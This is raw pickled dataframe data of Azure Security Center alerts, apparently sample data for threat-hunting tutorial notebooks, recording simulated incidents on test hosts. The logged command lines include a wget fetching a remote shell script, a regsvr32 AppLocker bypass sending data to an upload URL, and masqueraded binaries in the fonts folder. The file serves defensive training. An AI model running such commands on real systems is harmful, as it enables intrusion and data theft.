tutorials-and-examples/example-notebooks/data/alerts_list.pkl (1,300 lines of code) (raw):

"{\"detailBladeInputs\":{\"id\":\"/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/providers/microsoft.operationalinsights/workspaces/asihuntomsworkspacev4\",\"parameters\":{\"q\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"timeInterval\":{\"intervalDuration\":1800,\"intervalEnd\":\"2019-02-16T21%3A39%3A02.000Z\"}}},\"detailBlade\":\"SearchBlade\",\"displayValue\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"extension\":\"Microsoft_OperationsManagementSuite_Workspace\",\"kind\":\"OpenBlade\"}", "Search Query Results Overall Count": "2", "Threshold Operator": "Greater Than", "Threshold Value": "0", "Query Interval in Minutes": "30", "Suppression in Minutes": "0", "Total Account Entities": "1", "Total IP Entities": "1", "Total Host Entities": "1" }�X,{ "Alert Mode": "Aggregated", "Search Query": "{\"detailBladeInputs\":{\"id\":\"/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/providers/microsoft.operationalinsights/workspaces/asihuntomsworkspacev4\",\"parameters\":{\"q\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"timeInterval\":{\"intervalDuration\":1800,\"intervalEnd\":\"2019-02-16T21%3A44%3A02.000Z\"}}},\"detailBlade\":\"SearchBlade\",\"displayValue\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"extension\":\"Microsoft_OperationsManagementSuite_Workspace\",\"kind\":\"OpenBlade\"}", "Search Query Results Overall Count": "2", "Threshold Operator": "Greater Than", "Threshold Value": "0", "Query Interval in Minutes": "30", "Suppression in Minutes": "0", "Total Account Entities": "1", "Total Host Entities": 
"1", "Total IP Entities": "1" }�X,{ "Alert Mode": "Aggregated", "Search Query": "{\"detailBladeInputs\":{\"id\":\"/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/providers/microsoft.operationalinsights/workspaces/asihuntomsworkspacev4\",\"parameters\":{\"q\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"timeInterval\":{\"intervalDuration\":1800,\"intervalEnd\":\"2019-02-16T23%3A49%3A02.000Z\"}}},\"detailBlade\":\"SearchBlade\",\"displayValue\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"extension\":\"Microsoft_OperationsManagementSuite_Workspace\",\"kind\":\"OpenBlade\"}", "Search Query Results Overall Count": "4", "Threshold Operator": "Greater Than", "Threshold Value": "0", "Query Interval in Minutes": "30", "Suppression in Minutes": "0", "Total Host Entities": "1", "Total IP Entities": "1", "Total Account Entities": "1" }�X,{ "Alert Mode": "Aggregated", "Search Query": "{\"detailBladeInputs\":{\"id\":\"/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/providers/microsoft.operationalinsights/workspaces/asihuntomsworkspacev4\",\"parameters\":{\"q\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"timeInterval\":{\"intervalDuration\":1800,\"intervalEnd\":\"2019-02-16T23%3A34%3A02.000Z\"}}},\"detailBlade\":\"SearchBlade\",\"displayValue\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"extension\":\"Microsoft_OperationsManagementSuite_Workspace\",\"kind\":\"OpenBlade\"}", "Search Query Results Overall Count": "4", "Threshold Operator": "Greater Than", "Threshold Value": "0", "Query Interval in Minutes": "30", 
"Suppression in Minutes": "0", "Total Account Entities": "1", "Total Host Entities": "1", "Total IP Entities": "1" }�X,{ "Alert Mode": "Aggregated", "Search Query": "{\"detailBladeInputs\":{\"id\":\"/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/providers/microsoft.operationalinsights/workspaces/asihuntomsworkspacev4\",\"parameters\":{\"q\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"timeInterval\":{\"intervalDuration\":1800,\"intervalEnd\":\"2019-02-16T23%3A54%3A02.000Z\"}}},\"detailBlade\":\"SearchBlade\",\"displayValue\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"extension\":\"Microsoft_OperationsManagementSuite_Workspace\",\"kind\":\"OpenBlade\"}", "Search Query Results Overall Count": "4", "Threshold Operator": "Greater Than", "Threshold Value": "0", "Query Interval in Minutes": "30", "Suppression in Minutes": "0", "Total Account Entities": "1", "Total IP Entities": "1", "Total Host Entities": "1" }�X�{ "isincident": "true", "Detected Time (UTC)": "2019-02-14 18:03:23 UTC", "Incident Stage": "abused resource in", "Compromised Host": "MSTICALERTSWIN1", "Start Time (UTC)": "2019-02-14 11:51:38 UTC", "crossvm": "false", "resourceType": "Virtual Machine", "ServiceId": "14fa08c7-c48e-4c18-950c-8148024b4398", "ReportingSystem": "Azure", "OccuringDatacenter": "eastus" }�X\{ "domain name": "MSTICAlertsWin1", "user name": "MSTICALERTSWIN1\\MSTICAdmin", "process name": "c:\\windows\\fonts\\conhost.exe", "command line": "c:\\windows\\fonts\\conhost.exe zip archive.mdb", "parent process": "rundll32.exe", "process id": "0x119c", "account logon id": "0x78225e", "User SID": "S-1-5-21-996632719-2361334927-4038480536-500", "parent process id": "0x12b0", "System Process": "CONHOST.EXE", "resourceType": "Virtual Machine", "ServiceId": 
"14fa08c7-c48e-4c18-950c-8148024b4398", "ReportingSystem": "Azure", "OccuringDatacenter": "eastus" }�XB{ "Compromised Host": "MSTICALERTSWIN1", "User Name": "MSTICALERTSWIN1\\MSTICAdmin", "Account Session Id": "0x78225e", "Suspicious Process": "c:\\w!ndows\\system32\\regsvr32.exe", "Suspicious Command Line": ".\\regsvr32 /u /s c:\\windows\\fonts\\csrss.exe \"http://www.401k.com/upload?pass=34592389\" post", "Parent Process": "c:\\windows\\system32\\cmd.exe", "Suspicious Process Id": "0x1150", "resourceType": "Virtual Machine", "ServiceId": "14fa08c7-c48e-4c18-950c-8148024b4398", "ReportingSystem": "Azure", "OccuringDatacenter": "eastus" }�X�{ "isincident": "true", "Detected Time (UTC)": "2019-02-14 05:19:13 UTC", "Incident Stage": "attacked other resources from", "Compromised Host": "MSTICALERTSWIN1", "Start Time (UTC)": "2019-02-12 11:48:01 UTC", "crossvm": "false", "resourceType": "Virtual Machine", "ServiceId": "14fa08c7-c48e-4c18-950c-8148024b4398", "ReportingSystem": "Azure", "OccuringDatacenter": "eastus" }�X*{ "Alert Mode": "Aggregated", "Search Query": "{\"detailBladeInputs\":{\"id\":\"/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/providers/microsoft.operationalinsights/workspaces/asihuntomsworkspacev4\",\"parameters\":{\"q\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"timeInterval\":{\"intervalDuration\":300,\"intervalEnd\":\"2019-02-18T16%3A44%3A21.000Z\"}}},\"detailBlade\":\"SearchBlade\",\"displayValue\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"extension\":\"Microsoft_OperationsManagementSuite_Workspace\",\"kind\":\"OpenBlade\"}", "Search Query Results Overall Count": "1", "Threshold Operator": "Greater Than", "Threshold Value": "0", "Query Interval in Minutes": "5", "Suppression in Minutes": "0", "Total Account 
Entities": "1", "Total Host Entities": "1", "Total IP Entities": "1" }�X�{ "Compromised Host": "MSTICALERTSLXVM2", "User Name": "dbadmin", "Account Session Id": "0x2fdcd", "Suspicious Process": "/usr/bin/wget", "Suspicious Command Line": "wget http://23.97.60.214/QuZYpObins.sh -t 3 -T 5", "Suspicious Process Id": "0x61a7", "resourceType": "Virtual Machine", "ServiceId": "14fa08c7-c48e-4c18-950c-8148024b4398", "ReportingSystem": "Azure", "OccuringDatacenter": "eastus" }�X$[ { "$id": "3", "Address": "23.97.60.214", "Type": "ip", "Count": 1 }, { "$id": "4", "HostName": "MSTICAlertsLxVM2", "Type": "host", "Count": 1 }, { "$id": "5", "Name": "dbadmin", "Type": "account", "Count": 1 } ]�X#[ { "$id": "3", "Address": "203.0.113.1", "Type": "ip", "Count": 1 }, { "$id": "4", "HostName": "MSTICAlertsLxVM2", "Type": "host", "Count": 1 }, { "$id": "5", "Name": "dbadmin", "Type": "account", "Count": 1 } ]�j�X�[ { "$id": "3", "Address": "23.97.60.214", "Type": "ip", "Count": 1 }, { "$id": "4", "Address": "203.0.113.1", "Type": "ip", "Count": 1 }, { "$id": "5", "HostName": "MSTICAlertsLxVM2", "Type": "host", "Count": 2 }, { "$id": "6", "Name": "dbadmin", "Type": "account", "Count": 2 } ]�j�j�j�j�j�j�j�X�[ { "$id": "3", "Address": "203.0.113.1", "Type": "ip", "Count": 1 }, { "$id": "4", "Address": "23.97.60.214", "Type": "ip", "Count": 1 }, { "$id": "5", "HostName": "MSTICAlertsLxVM2", "Type": "host", "Count": 2 }, { "$id": "6", "Name": "dbadmin", "Type": "account", "Count": 2 } ]�j�j�j�X#[ { "$id": "3", "Address": "203.0.113.1", "Type": "ip", "Count": 4 }, { "$id": "4", "HostName": "MSTICAlertsLxVM2", "Type": "host", "Count": 4 }, { "$id": "5", "Name": "dbadmin", "Type": "account", "Count": 4 } ]�j�j�X$[ { "$id": "3", "Address": "104.211.30.1", "Type": "ip", "Count": 1 }, { "$id": "4", "HostName": "MSTICAlertsLxVM2", "Type": "host", "Count": 1 }, { "$id": "5", "Name": "dbadmin", "Type": "account", "Count": 1 } ]�j�X[ { "$id": "4", "DnsDomain": "", "NTDomain": "", "HostName": 
"MSTICALERTSLXVM2", "NetBiosName": "MSTICALERTSLXVM2", "OSFamily": "Linux", "OSVersion": "Linux", "Type": "host" }, { "$id": "5", "ProcessId": "0x4e4f", "CommandLine": "", "Host": { "$ref": "4" }, "Type": "process" }, { "$id": "6", "Name": "dbadmin", "Host": { "$ref": "4" }, "Sid": "1001:1001", "Type": "account", "LogonId": "0x2e8cf" }, { "$id": "7", "Directory": "/usr/bin", "Name": "wget", "Type": "file" }, { "$id": "8", "ProcessId": "0x4e55", "CommandLine": "wget http://13.67.35.176/QuZYpObins.sh -t 3 -T 5", "CreationTimeUtc": "2019-02-16T03:23:54.29Z", "ImageFile": { "$ref": "7" }, "Account": { "$ref": "6" }, "ParentProcess": { "$ref": "5" }, "Host": { "$ref": "4" }, "Type": "process" }, { "$id": "9", "SessionId": "0x2e8cf", "StartTimeUtc": "2019-02-16T03:23:54.29Z", "EndTimeUtc": "2019-02-16T03:23:54.29Z", "Type": "host-logon-session", "Host": { "$ref": "4" }, "Account": { "$ref": "6" } } ]�X[ { "$id": "4", "DnsDomain": "", "NTDomain": "", "HostName": "MSTICALERTSLXVM2", "NetBiosName": "MSTICALERTSLXVM2", "OSFamily": "Linux", "OSVersion": "Linux", "Type": "host" }, { "$id": "5", "ProcessId": "0x4ccc", "CommandLine": "", "Host": { "$ref": "4" }, "Type": "process" }, { "$id": "6", "Name": "dbadmin", "Host": { "$ref": "4" }, "Sid": "1001:1001", "Type": "account", "LogonId": "0x2e083" }, { "$id": "7", "Directory": "/usr/bin", "Name": "wget", "Type": "file" }, { "$id": "8", "ProcessId": "0x4cd2", "CommandLine": "wget http://131.107.147.81/QuZYpObins.sh -t 3 -T 5", "CreationTimeUtc": "2019-02-15T03:50:55.923Z", "ImageFile": { "$ref": "7" }, "Account": { "$ref": "6" }, "ParentProcess": { "$ref": "5" }, "Host": { "$ref": "4" }, "Type": "process" }, { "$id": "9", "SessionId": "0x2e083", "StartTimeUtc": "2019-02-15T03:50:55.923Z", "EndTimeUtc": "2019-02-15T03:50:55.923Z", "Type": "host-logon-session", "Host": { "$ref": "4" }, "Account": { "$ref": "6" } } ]�X[ { "$id": "4", "DnsDomain": "", "NTDomain": "", "HostName": "MSTICALERTSLXVM2", "NetBiosName": "MSTICALERTSLXVM2", 
"OSFamily": "Linux", "OSVersion": "Linux", "Type": "host" }, { "$id": "5", "ProcessId": "0x518a", "CommandLine": "", "Host": { "$ref": "4" }, "Type": "process" }, { "$id": "6", "Name": "dbadmin", "Host": { "$ref": "4" }, "Sid": "1001:1001", "Type": "account", "LogonId": "0x2e093" }, { "$id": "7", "Directory": "/usr/bin", "Name": "vim.basic", "Type": "file" }, { "$id": "8", "ProcessId": "0x51b3", "CommandLine": "/usr/bin/vim.basic /tmp/crontab.UQ6iiQ/crontab", "CreationTimeUtc": "2019-02-15T04:03:22.173Z", "ImageFile": { "$ref": "7" }, "Account": { "$ref": "6" }, "ParentProcess": { "$ref": "5" }, "Host": { "$ref": "4" }, "Type": "process" }, { "$id": "9", "SessionId": "0x2e093", "StartTimeUtc": "2019-02-15T04:03:22.173Z", "EndTimeUtc": "2019-02-15T04:03:22.173Z", "Type": "host-logon-session", "Host": { "$ref": "4" }, "Account": { "$ref": "6" } } ]�X�[ { "$id": "4", "DisplayName": "Possible suspicious scheduling tasks access detected", "CompromisedEntity": "MSTICALERTSLXVM2", "Count": 2, "Severity": "Informational", "SystemAlertIds": [ "2518522745615999999_c57a0525-9ca0-4caa-aee8-fd1bb33f785b" ], "AlertType": "SCUBA_RULE_AccessCronJob", "VendorName": "Microsoft", "ProviderName": "Detection", "StartTimeUtc": "2019-02-13T02:50:38.4Z", "EndTimeUtc": "2019-02-13T02:50:38.4Z", "Type": "alerts", "Location": "Central US" }, { "$id": "5", "DisplayName": "Detected suspicious file download", "CompromisedEntity": "MSTICALERTSLXVM2", "Count": 2, "Severity": "Low", "SystemAlertIds": [ "2518520981440769999_caab1270-55d3-4447-8618-16cf8672e4e1" ], "AlertType": "SCUBA_RULE_Suspicious_file_download", "VendorName": "Microsoft", "ProviderName": "Detection", "StartTimeUtc": "2019-02-15T03:50:55.923Z", "EndTimeUtc": "2019-02-15T03:50:55.923Z", "Type": "alerts", "Location": "Central US" }, { "$id": "6", "DisplayName": "Possible suspicious scheduling tasks access detected", "CompromisedEntity": "MSTICALERTSLXVM2", "Count": 2, "Severity": "Informational", "SystemAlertIds": [ 
"2518520973978269999_57b6af71-984e-45f3-9aac-d6bbd79eed07" ], "AlertType": "SCUBA_RULE_AccessCronJob", "VendorName": "Microsoft", "ProviderName": "Detection", "StartTimeUtc": "2019-02-15T04:03:22.173Z", "EndTimeUtc": "2019-02-15T04:03:22.173Z", "Type": "alerts", "Location": "Central US" } ]�X�[ { "$id": "2", "HostName": "msticalertswin1", "AzureID": "/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1", "OMSAgentID": "263a788b-6526-4cdc-8ed9-d79402fe4aa0", "Type": "host" }, { "$id": "3", "Name": "ian", "NTDomain": "msticalertswin1", "Host": { "$ref": "2" }, "IsDomainJoined": false, "Type": "account" } ]�X[ { "$id": "4", "DnsDomain": "", "NTDomain": "", "HostName": "MSTICALERTSLXVM2", "NetBiosName": "MSTICALERTSLXVM2", "OSFamily": "Linux", "OSVersion": "Linux", "Type": "host" }, { "$id": "5", "ProcessId": "0x28be", "CommandLine": "", "Host": { "$ref": "4" }, "Type": "process" }, { "$id": "6", "Name": "dbadmin", "Host": { "$ref": "4" }, "Sid": "1001:1001", "Type": "account", "LogonId": "0x2e61f" }, { "$id": "7", "Directory": "/usr/bin", "Name": "wget", "Type": "file" }, { "$id": "8", "ProcessId": "0x28c4", "CommandLine": "wget http://131.107.147.81/QuZYpObins.sh -t 3 -T 5", "CreationTimeUtc": "2019-02-15T19:43:49.39Z", "ImageFile": { "$ref": "7" }, "Account": { "$ref": "6" }, "ParentProcess": { "$ref": "5" }, "Host": { "$ref": "4" }, "Type": "process" }, { "$id": "9", "SessionId": "0x2e61f", "StartTimeUtc": "2019-02-15T19:43:49.39Z", "EndTimeUtc": "2019-02-15T19:43:49.39Z", "Type": "host-logon-session", "Host": { "$ref": "4" }, "Account": { "$ref": "6" } } ]�X$[ { "$id": "3", "Address": "104.211.30.1", "Type": "ip", "Count": 2 }, { "$id": "4", "HostName": "MSTICAlertsLxVM2", "Type": "host", "Count": 2 }, { "$id": "5", "Name": "dbadmin", "Type": "account", "Count": 2 } ]�j�j�j�j�j�j�j�j�XM[ { "$id": "4", "DisplayName": "Suspicious system process executed", 
"CompromisedEntity": "MSTICALERTSWIN1", "Count": 2, "Severity": "Medium", "SystemAlertIds": [ "2518521557015111330_65a3fe73-0832-427a-aab3-06edc2c27f0a" ], "AlertType": "SuspiciousSystemProcess", "VendorName": "Microsoft", "ProviderName": "Detection", "StartTimeUtc": "2019-02-14T11:51:38.4888669Z", "EndTimeUtc": "2019-02-14T11:51:38.4888669Z", "Type": "alerts", "Location": "Central US" }, { "$id": "5", "DisplayName": "Potential attempt to bypass AppLocker detected", "CompromisedEntity": "MSTICALERTSWIN1", "Count": 2, "Severity": "High", "SystemAlertIds": [ "2518521557014927413_daa18e53-ab1d-4d7d-8c4f-bcb86f75fd5f" ], "AlertType": "SCUBA_RULE_Applocker_Bypass", "VendorName": "Microsoft", "ProviderName": "Detection", "StartTimeUtc": "2019-02-14T11:51:38.5072586Z", "EndTimeUtc": "2019-02-14T11:51:38.5072586Z", "Type": "alerts", "Location": "Central US" } ]�X�[ { "$id": "4", "DnsDomain": "", "NTDomain": "", "HostName": "MSTICALERTSWIN1", "NetBiosName": "MSTICALERTSWIN1", "OSFamily": "Windows", "OSVersion": "Windows", "IsDomainJoined": false, "Type": "host" }, { "$id": "5", "Directory": "c:\\w!ndows\\system32", "Name": "rundll32.exe", "Type": "file" }, { "$id": "6", "ProcessId": "0x12b0", "CommandLine": "", "ImageFile": { "$ref": "5" }, "Host": { "$ref": "4" }, "Type": "process" }, { "$id": "7", "Name": "MSTICAdmin", "NTDomain": "MSTICAlertsWin1", "Host": { "$ref": "4" }, "Sid": "S-1-5-21-996632719-2361334927-4038480536-500", "IsDomainJoined": false, "Type": "account", "LogonId": "0x78225e" }, { "$id": "8", "Directory": "c:\\windows\\fonts", "Name": "conhost.exe", "Type": "file" }, { "$id": "9", "ProcessId": "0x119c", "CommandLine": "c:\\windows\\fonts\\conhost.exe zip archive.mdb", "ElevationToken": "Default", "CreationTimeUtc": "2019-02-14T11:51:38.4888669Z", "ImageFile": { "$ref": "8" }, "Account": { "$ref": "7" }, "ParentProcess": { "$ref": "6" }, "Host": { "$ref": "4" }, "Type": "process" }, { "$id": "10", "SessionId": "0x78225e", "StartTimeUtc": 
"2019-02-14T11:51:38.4888669Z", "EndTimeUtc": "2019-02-14T11:51:38.4888669Z", "Type": "host-logon-session", "Host": { "$ref": "4" }, "Account": { "$ref": "7" } } ]�X�[ { "$id": "4", "DnsDomain": "", "NTDomain": "", "HostName": "MSTICALERTSWIN1", "NetBiosName": "MSTICALERTSWIN1", "OSFamily": "Windows", "OSVersion": "Windows", "IsDomainJoined": false, "Type": "host" }, { "$id": "5", "Directory": "c:\\windows\\system32", "Name": "cmd.exe", "Type": "file" }, { "$id": "6", "ProcessId": "0x12f4", "CommandLine": "", "ImageFile": { "$ref": "5" }, "Host": { "$ref": "4" }, "Type": "process" }, { "$id": "7", "Name": "MSTICAdmin", "NTDomain": "MSTICAlertsWin1", "Host": { "$ref": "4" }, "Sid": "S-1-5-21-996632719-2361334927-4038480536-500", "IsDomainJoined": false, "Type": "account", "LogonId": "0x78225e" }, { "$id": "8", "Directory": "c:\\w!ndows\\system32", "Name": "regsvr32.exe", "Type": "file" }, { "$id": "9", "ProcessId": "0x1150", "CommandLine": ".\\regsvr32 /u /s c:\\windows\\fonts\\csrss.exe \"http://www.401k.com/upload?pass=34592389\" post", "ElevationToken": "Default", "CreationTimeUtc": "2019-02-14T11:51:38.5072586Z", "ImageFile": { "$ref": "8" }, "Account": { "$ref": "7" }, "ParentProcess": { "$ref": "6" }, "Host": { "$ref": "4" }, "Type": "process" }, { "$id": "10", "SessionId": "0x78225e", "StartTimeUtc": "2019-02-14T11:51:38.5072586Z", "EndTimeUtc": "2019-02-14T11:51:38.5072586Z", "Type": "host-logon-session", "Host": { "$ref": "4" }, "Account": { "$ref": "7" } } ]�X� [ { "$id": "4", "DisplayName": "Modified system binary discovered", "CompromisedEntity": "MSTICALERTSWIN1", "Count": 2, "Severity": "Informational", "SystemAlertIds": [ "2518523287189999999_6e644c01-6feb-436b-9c96-46a86c9c16aa" ], "AlertType": "Modified system binary discovered", "VendorName": "Microsoft", "ProviderName": "AzureSCA", "StartTimeUtc": "2019-02-12T11:48:01Z", "EndTimeUtc": "2019-02-12T11:48:01Z", "Type": "alerts", "Location": "Central US" }, { "$id": "5", "DisplayName": "Suspiciously 
named process detected", "CompromisedEntity": "MSTICALERTSWIN1", "Count": 2, "Severity": "High", "SystemAlertIds": [ "2518522053771835343_649075c9-dc5d-4a75-a848-9c51f70a45ae" ], "AlertType": "SCUBA_PROCESSNAMESIMILARITY", "VendorName": "Microsoft", "ProviderName": "Detection", "StartTimeUtc": "2019-02-13T22:03:42.8164656Z", "EndTimeUtc": "2019-02-13T22:03:42.8164656Z", "Type": "alerts", "Location": "Central US" }, { "$id": "6", "DisplayName": "Digital currency mining related behavior detected", "CompromisedEntity": "MSTICALERTSWIN1", "Count": 2, "Severity": "High", "SystemAlertIds": [ "2518522053771835343_cf383339-b4ff-4996-9d4e-83a4ece6688f" ], "AlertType": "SCUBA_RULE_DigitalCurrencyMiningTool", "VendorName": "Microsoft", "ProviderName": "Detection", "StartTimeUtc": "2019-02-13T22:03:42.8164656Z", "EndTimeUtc": "2019-02-13T22:03:42.8164656Z", "Type": "alerts", "Location": "Central US" }, { "$id": "7", "DisplayName": "Detected potentially suspicious use of Telegram tool", "CompromisedEntity": "MSTICALERTSWIN1", "Count": 2, "Severity": "Medium", "SystemAlertIds": [ "2518522015557283714_a1008225-c62f-4f51-84aa-6aad89a02b3a" ], "AlertType": "SCUBA_RULE_Telegram_install", "VendorName": "Microsoft", "ProviderName": "Detection", "StartTimeUtc": "2019-02-13T23:07:24.2716285Z", "EndTimeUtc": "2019-02-13T23:07:24.2716285Z", "Type": "alerts", "Location": "Central US" }, { "$id": "8", "DisplayName": "Detected the disabling of critical services", "CompromisedEntity": "MSTICALERTSWIN1", "Count": 2, "Severity": "Medium", "SystemAlertIds": [ "2518522015556924218_856f3dbd-ca72-474d-ab00-75956b161a02" ], "AlertType": "SCUBA_RULE_Lowering_Security_Settings", "VendorName": "Microsoft", "ProviderName": "Detection", "StartTimeUtc": "2019-02-13T23:07:24.3075781Z", "EndTimeUtc": "2019-02-13T23:07:24.3075781Z", "Type": "alerts", "Location": "Central US" } ]��� j�X[ { "$id": "4", "DnsDomain": "", "NTDomain": "", "HostName": "MSTICALERTSLXVM2", "NetBiosName": "MSTICALERTSLXVM2", 
"OSFamily": "Linux", "OSVersion": "Linux", "Type": "host" }, { "$id": "5", "ProcessId": "0x61a1", "CommandLine": "", "Host": { "$ref": "4" }, "Type": "process" }, { "$id": "6", "Name": "dbadmin", "Host": { "$ref": "4" }, "Sid": "1001:1001", "Type": "account", "LogonId": "0x2fdcd" }, { "$id": "7", "Directory": "/usr/bin", "Name": "wget", "Type": "file" }, { "$id": "8", "ProcessId": "0x61a7", "CommandLine": "wget http://23.97.60.214/QuZYpObins.sh -t 3 -T 5", "CreationTimeUtc": "2019-02-18T15:29:22.207Z", "ImageFile": { "$ref": "7" }, "Account": { "$ref": "6" }, "ParentProcess": { "$ref": "5" }, "Host": { "$ref": "4" }, "Type": "process" }, { "$id": "9", "SessionId": "0x2fdcd", "StartTimeUtc": "2019-02-18T15:29:22.207Z", "EndTimeUtc": "2019-02-18T15:29:22.207Z", "Type": "host-logon-session", "Host": { "$ref": "4" }, "Account": { "$ref": "6" } } ]�� Detection�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j��$40dcc8bf-0478-4f3b-b275-ed0a94f2c013�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j��asihuntomsworkspacerg�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�� SecurityAlert�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�j�G�G�G�G�G�G�G�G�G�G�G�G�G�G�G�G�G�G�G�G��MSTICALERTSLXVM2�j�j�j�G�j�G�G�G�G�G�G�G�G�G��MSTICALERTSWIN1�G�j�j�G�j�et�be]�(h h}�(hhhK��h��R�(KK��h!�]�(h3h>h?h@hAet�bhENu��R�h h}�(hhhK��h��R�(KK��h!�]�h&at�bhENu��R�h h}�(hhhK��h��R�(KK��h!�]�h4at�bhENu��R�h h}�(hhhK��h��R�(KK��h!�]�(h%h'h(h)h*h+h,h-h.h/h0h1h2h5h6h7h8h9h:h;h<h=hBhCet�bhENu��R�e}��0.14.1�}�(�axes�h �blocks�]�(}�(�values�h\�mgr_locs�hhK��h��R�(KK��hR�C(�t�bu}�(j�hfj��builtins��slice���KKK��R�u}�(j�htj�j�KKK��R�u}�(j�h~j�hhK��h��R�(KK��hR�C� �t�bueust�b�_typ�� dataframe�� _metadata�]�ub.